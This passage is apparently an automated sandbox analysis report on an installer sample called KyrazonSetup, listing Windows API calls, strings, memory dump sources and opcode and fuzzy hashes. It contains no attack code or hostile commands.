                                                                                      • Associated: 00000000.00000002.1919722258.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000448000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000457000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000487000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000493000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1920055468.00000000004E5000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharCreateInstanceMultiWide
                                                                                      • String ID:
                                                                                      • API String ID: 123533781-0
                                                                                      • Opcode ID: c06e033e1e2c95d1fe580b90fda3cbfe14670beca3e660ca2b57938a98181c45
                                                                                      • Instruction ID: 38f9ea58667bbeefe91ea46def2d4473f2bb8d40fc5798594265f0c7871110e2
                                                                                      • Opcode Fuzzy Hash: c06e033e1e2c95d1fe580b90fda3cbfe14670beca3e660ca2b57938a98181c45
                                                                                      • Instruction Fuzzy Hash: 97511671A00208BFCB10DFE4C989A9D7BB6BF49318F2085AAF515EB2D1DA799941CF14
                                                                                      APIs
                                                                                      • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 0040270D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileFindFirst
                                                                                      • String ID:
                                                                                      • API String ID: 1974802433-0
                                                                                      • Opcode ID: 30279c0e50a8690cce3ffb9d7c79d757c173bf2cb79eb9bac223a122c5b329d7
                                                                                      • Instruction ID: 5aed6d40d86b88915634d7fec2bcc4b02db16a4bc7a6b1cfd12d68146168d207
                                                                                      • Opcode Fuzzy Hash: 30279c0e50a8690cce3ffb9d7c79d757c173bf2cb79eb9bac223a122c5b329d7
                                                                                      • Instruction Fuzzy Hash: 42F0A772604151ABD700E7A499499EEB76CDF11324F60057BE181F20C1CABC8A459B3A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 82a44bc8fd526afdff965e1cd5e7f2d0a246497ca5c27b0c944ad4ba04d420dd
                                                                                      • Instruction ID: c7d8350576d698755b4cacea6fe682166efb8a165fc05e4c5726b7f1812f50b8
                                                                                      • Opcode Fuzzy Hash: 82a44bc8fd526afdff965e1cd5e7f2d0a246497ca5c27b0c944ad4ba04d420dd
                                                                                      • Instruction Fuzzy Hash: F4E17971900706DFDB24CF58C880BAAB7F5FB44305F15842EE897A7291E738AA95CF54
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1b132db68e09e38111b46a630986fe986278179b426aaa6f424b6530bbbb36a0
                                                                                      • Instruction ID: ff0fd36e996cd89d8e6760587b242a798bd2a834485e3e6d32977043394459b2
                                                                                      • Opcode Fuzzy Hash: 1b132db68e09e38111b46a630986fe986278179b426aaa6f424b6530bbbb36a0
                                                                                      • Instruction Fuzzy Hash: 76C15931E042599BCF14CF68D4905EEB7B2FF89314F25826AD8567B380D738A942CF95
                                                                                      APIs
                                                                                      • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00404235
                                                                                      • GetDlgItem.USER32(00000000,000003E8), ref: 00404249
                                                                                      • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00404267
                                                                                      • GetSysColor.USER32(?), ref: 00404278
                                                                                      • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404287
                                                                                      • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404296
                                                                                      • lstrlenA.KERNEL32(?), ref: 00404299
                                                                                      • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004042A8
                                                                                      • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004042BD
                                                                                      • GetDlgItem.USER32(?,0000040A), ref: 0040431F
                                                                                      • SendMessageA.USER32(00000000), ref: 00404322
                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 0040434D
                                                                                      • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 0040438D
                                                                                      • LoadCursorA.USER32(00000000,00007F02), ref: 0040439C
                                                                                      • SetCursor.USER32(00000000), ref: 004043A5
                                                                                      • LoadCursorA.USER32(00000000,00007F00), ref: 004043BB
                                                                                      • SetCursor.USER32(00000000), ref: 004043BE
                                                                                      • SendMessageA.USER32(00000111,00000001,00000000), ref: 004043EA
                                                                                      • SendMessageA.USER32(00000010,00000000,00000000), ref: 004043FE
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                      • String ID: N$Remove folder: $uA@
                                                                                      • API String ID: 3103080414-4189957094
                                                                                      • Opcode ID: d4eefe654d22cd8461d298cd50b25cc69fd42f6e548781b2386fab9e0069321a
                                                                                      • Instruction ID: 189a73e33a32ab5629d9b6d5aa7b8342c7ad0906f2d845131673515c77320290
                                                                                      • Opcode Fuzzy Hash: d4eefe654d22cd8461d298cd50b25cc69fd42f6e548781b2386fab9e0069321a
                                                                                      • Instruction Fuzzy Hash: 3D61A3B1A40209BFEB109F61CD45F6A7B69EB84705F10803AFB05BA1D1C7B8A951CF68
                                                                                      APIs
                                                                                      • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                      • BeginPaint.USER32(?,?), ref: 00401047
                                                                                      • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                      • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                      • DeleteObject.GDI32(?), ref: 004010ED
                                                                                      • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                      • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                      • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                      • DrawTextA.USER32(00000000,0044E400,000000FF,00000010,00000820), ref: 00401156
                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                      • DeleteObject.GDI32(?), ref: 00401165
                                                                                      • EndPaint.USER32(?,?), ref: 0040116E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                      • String ID: F
                                                                                      • API String ID: 941294808-1304234792
                                                                                      • Opcode ID: 9a87abe2a4d34ea04cac22e8b23e016ca7fa537fe8c057691b6d5ac7f024c321
                                                                                      • Instruction ID: 0f017803aeec3de1db0009a5ab91645596a598df957f8b8ef67319ce70b6f2d5
                                                                                      • Opcode Fuzzy Hash: 9a87abe2a4d34ea04cac22e8b23e016ca7fa537fe8c057691b6d5ac7f024c321
                                                                                      • Instruction Fuzzy Hash: 74418C71800209AFCF058F95CE459AFBBB9FF45315F00842EF5A1AA1A0C774D955DFA4
                                                                                      APIs
                                                                                      • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00405DA0,?,?), ref: 00405C40
                                                                                      • GetShortPathNameA.KERNEL32(?,00448600,00000400), ref: 00405C49
                                                                                        • Part of subcall function 00405A9E: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF9,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AAE
                                                                                        • Part of subcall function 00405A9E: lstrlenA.KERNEL32(00000000,?,00000000,00405CF9,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AE0
                                                                                      • GetShortPathNameA.KERNEL32(?,00448A00,00000400), ref: 00405C66
                                                                                      • wsprintfA.USER32 ref: 00405C84
                                                                                      • GetFileSize.KERNEL32(00000000,00000000,00448A00,C0000000,00000004,00448A00,?,?,?,?,?), ref: 00405CBF
                                                                                      • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405CCE
                                                                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D06
                                                                                      • SetFilePointer.KERNEL32(0040A3B8,00000000,00000000,00000000,00000000,00448200,00000000,-0000000A,0040A3B8,00000000,[Rename],00000000,00000000,00000000), ref: 00405D5C
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00405D6D
                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405D74
                                                                                        • Part of subcall function 00405B39: GetFileAttributesA.KERNELBASE(00000003,00402DA3,00489000,80000000,00000003), ref: 00405B3D
                                                                                        • Part of subcall function 00405B39: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B5F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                      • String ID: %s=%s$[Rename]
                                                                                      • API String ID: 2171350718-1727408572
                                                                                      • Opcode ID: f91431428f4f9cf126320bd5d83c4c3157d753f908e71048d70342efb9ce6d80
                                                                                      • Instruction ID: e673f0d6058c791d0c25712d379d652ad09bbbe08baf3ed575ce0f5f839497a3
                                                                                      • Opcode Fuzzy Hash: f91431428f4f9cf126320bd5d83c4c3157d753f908e71048d70342efb9ce6d80
                                                                                      • Instruction Fuzzy Hash: 1C31D331200F15ABD2207B659D49F6B3A5CDF46754F14453FBA01B62D2EABCA8018E6D
                                                                                      APIs
                                                                                      • lstrlenA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\,00000000,00422028,74DF23A0,?,?,?,?,?,?,?,?,?,004030F7,00000000,?), ref: 00405100
                                                                                      • lstrlenA.KERNEL32(004030F7,Remove folder: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\,00000000,00422028,74DF23A0,?,?,?,?,?,?,?,?,?,004030F7,00000000), ref: 00405110
                                                                                      • lstrcatA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\,004030F7,004030F7,Remove folder: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\,00000000,00422028,74DF23A0), ref: 00405123
                                                                                      • SetWindowTextA.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\), ref: 00405135
                                                                                      • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040515B
                                                                                      • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405175
                                                                                      • SendMessageA.USER32(?,00001013,?,00000000), ref: 00405183
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                      • String ID: Remove folder: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\
                                                                                      • API String ID: 2531174081-2777811413
                                                                                      • Opcode ID: d21e6d514fbfc4abde305c1ef67b874bd8ab4c643857dcd361e5a81f6eb4b346
                                                                                      • Instruction ID: 5f823985bcc8b2cdd8f6641b2ca88111799b2924c5ea7b151e34c18a46508a3e
                                                                                      • Opcode Fuzzy Hash: d21e6d514fbfc4abde305c1ef67b874bd8ab4c643857dcd361e5a81f6eb4b346
                                                                                      • Instruction Fuzzy Hash: A5216071D00618BADB119FA5DD84ADFBFB9EB09354F14807AF944B6291C7398E408F68
                                                                                      APIs
                                                                                      • GetWindowLongA.USER32(?,000000EB), ref: 004040C3
                                                                                      • GetSysColor.USER32(00000000), ref: 00404101
                                                                                      • SetTextColor.GDI32(?,00000000), ref: 0040410D
                                                                                      • SetBkMode.GDI32(?,?), ref: 00404119
                                                                                      • GetSysColor.USER32(?), ref: 0040412C
                                                                                      • SetBkColor.GDI32(?,?), ref: 0040413C
                                                                                      • DeleteObject.GDI32(?), ref: 00404156
                                                                                      • CreateBrushIndirect.GDI32(?), ref: 00404160
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                      • String ID:
                                                                                      • API String ID: 2320649405-0
                                                                                      • Opcode ID: 49e3bf83d30a7d96e63afb16dabbed360c02e673e0f4069f8acd1b63125549d3
                                                                                      • Instruction ID: acf379a668eb7ba76ca74fd388386b38bd03efbb8d8a5887114ae3c25b447e5f
                                                                                      • Opcode Fuzzy Hash: 49e3bf83d30a7d96e63afb16dabbed360c02e673e0f4069f8acd1b63125549d3
                                                                                      • Instruction Fuzzy Hash: 122174715007049BCB309F78DD4CB5BBBF8AF91710B048A3EEA96A66E0D734D984CB54
                                                                                      APIs
                                                                                      • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 004049AD
                                                                                      • GetMessagePos.USER32 ref: 004049B5
                                                                                      • ScreenToClient.USER32(?,?), ref: 004049CF
                                                                                      • SendMessageA.USER32(?,00001111,00000000,?), ref: 004049E1
                                                                                      • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404A07
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: Message$Send$ClientScreen
                                                                                      • String ID: f
                                                                                      • API String ID: 41195575-1993550816
                                                                                      • Opcode ID: 33c806690141bddee9d4868c528a06b643bfd418e36cfd9cd505f5ef0f9636f7
                                                                                      • Instruction ID: 01adb620d992fda54c9cccfda8f446508f93e77e16c9618e278126a6ed05cf06
                                                                                      • Opcode Fuzzy Hash: 33c806690141bddee9d4868c528a06b643bfd418e36cfd9cd505f5ef0f9636f7
                                                                                      • Instruction Fuzzy Hash: 14015E75900219BAEB00DBA4DD85BFFBBBCAF55711F10412BBA50F61C0C7B499418BA4
                                                                                      APIs
                                                                                      • GetDC.USER32(?), ref: 00401D9E
                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DB8
                                                                                      • MulDiv.KERNEL32(00000000,00000000), ref: 00401DC0
                                                                                      • ReleaseDC.USER32(?,00000000), ref: 00401DD1
                                                                                      • CreateFontIndirectA.GDI32(00414418), ref: 00401E20
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                      • String ID: MS Shell Dlg
                                                                                      • API String ID: 3808545654-76309092
                                                                                      • Opcode ID: f592c05a4aa41413d76682ba287349174b279d32fcdcd62327a061fd3fecde38
                                                                                      • Instruction ID: 8eb8a613e517b0ada4c927cb5962fe8d64921dcd133049690b029bc7932b5da1
                                                                                      • Opcode Fuzzy Hash: f592c05a4aa41413d76682ba287349174b279d32fcdcd62327a061fd3fecde38
                                                                                      • Instruction Fuzzy Hash: 1B017571944240AFE7005BB4BE59BDA3FB49B99705F10843AF141B61E2CA7904458F2D
                                                                                      APIs
                                                                                      • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C97
                                                                                      • MulDiv.KERNEL32(04C85BD4,00000064,04C85BD8), ref: 00402CC2
                                                                                      • wsprintfA.USER32 ref: 00402CD2
                                                                                      • SetWindowTextA.USER32(?,?), ref: 00402CE2
                                                                                      • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402CF4
                                                                                      Strings
                                                                                      • verifying installer: %d%%, xrefs: 00402CCC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: Text$ItemTimerWindowwsprintf
                                                                                      • String ID: verifying installer: %d%%
                                                                                      • API String ID: 1451636040-82062127
                                                                                      • Opcode ID: d562dd5390d3a0e7d9675bc1a4fc8cfd357df08b0b8af2f41c950853e011aaf8
                                                                                      • Instruction ID: 3314197b3f9f5dc33a1332829412108c9be2eec106a00c297f207c8eb8ab8f63
                                                                                      • Opcode Fuzzy Hash: d562dd5390d3a0e7d9675bc1a4fc8cfd357df08b0b8af2f41c950853e011aaf8
                                                                                      • Instruction Fuzzy Hash: AD014F70640208FBEF249F61DD09EEE37A9AB04304F008039FA06B52D0DBB999558F59
                                                                                      APIs
                                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402790
                                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 004027AC
                                                                                      • GlobalFree.KERNEL32(?), ref: 004027EB
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 004027FE
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 00402816
                                                                                      • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040282A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                      • String ID:
                                                                                      • API String ID: 2667972263-0
                                                                                      • Opcode ID: adc14c698ea9f6e2abac3a03bd9f9e1104f5e15cfd0a5a3d471f2bb4dcc3505b
                                                                                      • Instruction ID: 8a438bf96df610f2c0569d5b63dfc02eada2097e819d04fb11786cc16195dd52
                                                                                      • Opcode Fuzzy Hash: adc14c698ea9f6e2abac3a03bd9f9e1104f5e15cfd0a5a3d471f2bb4dcc3505b
                                                                                      • Instruction Fuzzy Hash: 37219F71800124BBDF217FA5CE49E9E7B79AF09364F14423AF510762E1CB7959009FA8
                                                                                      APIs
                                                                                      • CharNextA.USER32(?,*?|<>/":,00000000,0047B000,74DF3410,00485000,00000000,004031E7,00485000,00485000,0040341E,?,00000006,00000008,0000000A), ref: 00406262
                                                                                      • CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040626F
                                                                                      • CharNextA.USER32(?,0047B000,74DF3410,00485000,00000000,004031E7,00485000,00485000,0040341E,?,00000006,00000008,0000000A), ref: 00406274
                                                                                      • CharPrevA.USER32(?,?,74DF3410,00485000,00000000,004031E7,00485000,00485000,0040341E,?,00000006,00000008,0000000A), ref: 00406284
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: Char$Next$Prev
                                                                                      • String ID: *?|<>/":
                                                                                      • API String ID: 589700163-165019052
                                                                                      • Opcode ID: baaf8be525beb263cd2d66daa4244c7e43047c81ac15102dd5c23876bc89bcef
                                                                                      • Instruction ID: 9cd3e807bb29f508aa56cad56700fba7970b0901ce3b2fdefae83793710aaee6
                                                                                      • Opcode Fuzzy Hash: baaf8be525beb263cd2d66daa4244c7e43047c81ac15102dd5c23876bc89bcef
                                                                                      • Instruction Fuzzy Hash: 1411E26180479129EB327A385C40BB76FD84F57764F1A04FFE8C6722C2C67C5C6292AE
                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?), ref: 00401D45
                                                                                      • GetClientRect.USER32(00000000,?), ref: 00401D52
                                                                                      • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D73
                                                                                      • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D81
                                                                                      • DeleteObject.GDI32(00000000), ref: 00401D90
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                      • String ID:
                                                                                      • API String ID: 1849352358-0
                                                                                      • Opcode ID: a964d8526154f294e612e7d9ff9cc29c2813b3260cc8b6307f377bf4ad37abae
                                                                                      • Instruction ID: 282c70e257672687937977203f7442070c9d6a131f668edff497fc8f2aae4d78
                                                                                      • Opcode Fuzzy Hash: a964d8526154f294e612e7d9ff9cc29c2813b3260cc8b6307f377bf4ad37abae
                                                                                      • Instruction Fuzzy Hash: 6DF0ECB2600515BFDB00ABA4DE89DAFB7BCEB44305B04446AF641F2191CA748D018B38
                                                                                      APIs
                                                                                      • lstrlenA.KERNEL32(0043C070,0043C070,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004047A3,000000DF,00000000,00000400,?), ref: 00404926
                                                                                      • wsprintfA.USER32 ref: 0040492E
                                                                                      • SetDlgItemTextA.USER32(?,0043C070), ref: 00404941
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: ItemTextlstrlenwsprintf
                                                                                      • String ID: %u.%u%s%s
                                                                                      • API String ID: 3540041739-3551169577
                                                                                      • Opcode ID: 804bf471802499da587795cb7ce61e75a366ce640a852ab7eb01692b6b25406e
                                                                                      • Instruction ID: 430113f872b093d5cb5bf88e97724e3c6f0970b02c9770434da8b0d71da58b6f
                                                                                      • Opcode Fuzzy Hash: 804bf471802499da587795cb7ce61e75a366ce640a852ab7eb01692b6b25406e
                                                                                      • Instruction Fuzzy Hash: 5A110A776042282BEB00666D9C41EAF3698DB86374F254637FA65F31D1E978CC1242E8
                                                                                      APIs
                                                                                      • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402C32
                                                                                      • RegCloseKey.ADVAPI32(?,?,?), ref: 00402C3B
                                                                                      • RegCloseKey.ADVAPI32(?,?,?), ref: 00402C5C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: Close$Enum
                                                                                      • String ID:
                                                                                      • API String ID: 464197530-0
                                                                                      • Opcode ID: 36a723ba0b9fe6841f0d996bf234943a63eacbada2c77057d577eaa1ff2cf2a2
                                                                                      • Instruction ID: bf26dd322600c86e705ae03821e5e95be148f4b98a6ddde11b8b46473537de7c
                                                                                      • Opcode Fuzzy Hash: 36a723ba0b9fe6841f0d996bf234943a63eacbada2c77057d577eaa1ff2cf2a2
                                                                                      • Instruction Fuzzy Hash: 0E115832504109FBEF129F90CF09F9E7B69AB08380F104076BD45B51E0EBB59E11AAA8
                                                                                      APIs
                                                                                      • CharNextA.USER32(?,?,C:\,?,00405A3D,C:\,C:\,74DF3410,?,00485000,00405788,?,74DF3410,00485000,00000000), ref: 004059DF
                                                                                      • CharNextA.USER32(00000000), ref: 004059E4
                                                                                      • CharNextA.USER32(00000000), ref: 004059F8
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: CharNext
                                                                                      • String ID: C:\
                                                                                      • API String ID: 3213498283-3404278061
                                                                                      • Opcode ID: 6ae5a98c75981dc822015e60cfe3a73e92d8e62117e7577616a1c134a98ac786
                                                                                      • Instruction ID: bee55f49184efbd237be32f98b77ae0f226092122a380d38f2b678f3dbc68710
                                                                                      • Opcode Fuzzy Hash: 6ae5a98c75981dc822015e60cfe3a73e92d8e62117e7577616a1c134a98ac786
                                                                                      • Instruction Fuzzy Hash: 26F0F6A1B18F546AFB3262681C94B7B5F8CCB95360F18427BDA40772C2C27C4C408FAA
                                                                                      APIs
                                                                                      • DestroyWindow.USER32(00000000,00000000,00402EDF,00000001), ref: 00402D12
                                                                                      • GetTickCount.KERNEL32 ref: 00402D30
                                                                                      • CreateDialogParamA.USER32(0000006F,00000000,00402C7C,00000000), ref: 00402D4D
                                                                                      • ShowWindow.USER32(00000000,00000005), ref: 00402D5B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                      • String ID:
                                                                                      • API String ID: 2102729457-0
                                                                                      • Opcode ID: 947536967f4a43c584f650ab2a8ee216eadfbd9976cd6052f6af3916685ae4bc
                                                                                      • Instruction ID: 2b7c5c63cbd29ff72544cae52a3e23fe45e5b8c23cd2423cebb75ca464e8a8de
                                                                                      • Opcode Fuzzy Hash: 947536967f4a43c584f650ab2a8ee216eadfbd9976cd6052f6af3916685ae4bc
                                                                                      • Instruction Fuzzy Hash: 1BF05E30A01720ABC6216F60FE4CA9B7A64AB09B16711047AF548B11E5CB78489A8B9D
                                                                                      APIs
                                                                                      • IsWindowVisible.USER32(?), ref: 0040506A
                                                                                      • CallWindowProcA.USER32(?,?,?,?), ref: 004050BB
                                                                                        • Part of subcall function 0040408B: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 0040409D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$CallMessageProcSendVisible
                                                                                      • String ID:
                                                                                      • API String ID: 3748168415-3916222277
                                                                                      • Opcode ID: 05cf8713f746d9a4a406987c7a2bd7a615f31e4f64c05b68a76d054521028bb6
                                                                                      • Instruction ID: 93015a436933028849a201d13bca6df21ec4f6fc61c1de1602f9096dd373d7f3
                                                                                      • Opcode Fuzzy Hash: 05cf8713f746d9a4a406987c7a2bd7a615f31e4f64c05b68a76d054521028bb6
                                                                                      • Instruction Fuzzy Hash: 90017C72200A48EFDF209F51DD80AAF3B65EB84750F14403BFA41B61D1D73A8C929FA9
                                                                                      APIs
                                                                                      • RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,00002000,Remove folder: ,?,?,?,?,00000002,Remove folder: ,?,004060CB,80000002), ref: 00405ECD
                                                                                      • RegCloseKey.ADVAPI32(?,?,004060CB,80000002,Software\Microsoft\Windows\CurrentVersion,Remove folder: ,Remove folder: ,Remove folder: ,?,Remove folder: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\), ref: 00405ED8
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseQueryValue
                                                                                      • String ID: Remove folder:
                                                                                      • API String ID: 3356406503-1958208860
                                                                                      • Opcode ID: a46a7b2256a3cf94146298450ac36a8ef4ab1670e4172636b82585cecf65f891
                                                                                      • Instruction ID: 42c18038d83e96b8be8c57851daa943d9c6deca899c079ab392a8b0fbbc298b2
